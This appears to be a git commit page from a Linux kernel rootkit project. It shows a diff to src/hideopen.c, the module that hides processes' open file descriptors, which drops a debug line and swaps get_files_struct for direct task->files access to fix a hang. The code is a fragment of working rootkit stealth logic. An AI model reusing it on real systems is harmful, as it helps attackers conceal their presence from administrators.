Fixes hang when task_struct is locked (and is safe, as we don't write to the files struct - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit f56ddb2a43cafd7be78fc1b1beac334b92c30d02
parent e0f2dbfbc2f175ed552c6d16fbe802a8a09c365a
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sat,  5 Dec 2020 23:42:14 +0100

Fixes hang when task_struct is locked (and is safe, as we don't write to the files struct

Diffstat:
M src/hideopen.c  | 7 +------

1 file changed, 1 insertion(+), 6 deletions(-)
diff --git a/src/hideopen.c b/src/hideopen.c
@@ -44,8 +44,6 @@ may_fd(struct file *dirfile)
             int i = 0;
 
             while(sub = (strsep(&cur, dir_sep))) {
-                DEBUG_INFO("sub is %s\n", sub);
-
                 switch(i++) {
                     case 1:
                         if(strcmp(sub, "proc"))
@@ -98,10 +96,7 @@ fill_fds(pid_t pid)
     if (!(spid = find_get_pid(pid)) || !(task = pid_task(spid, PIDTYPE_PID)))
         return;
 
-    if(!(fs = get_files_struct(task)))
-        return;
-
-    iterate_fd(fs, 0, (void *)fd_callback, NULL);    
+    iterate_fd(task->files, 0, (void *)fd_callback, NULL);    
 }
 
 void

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs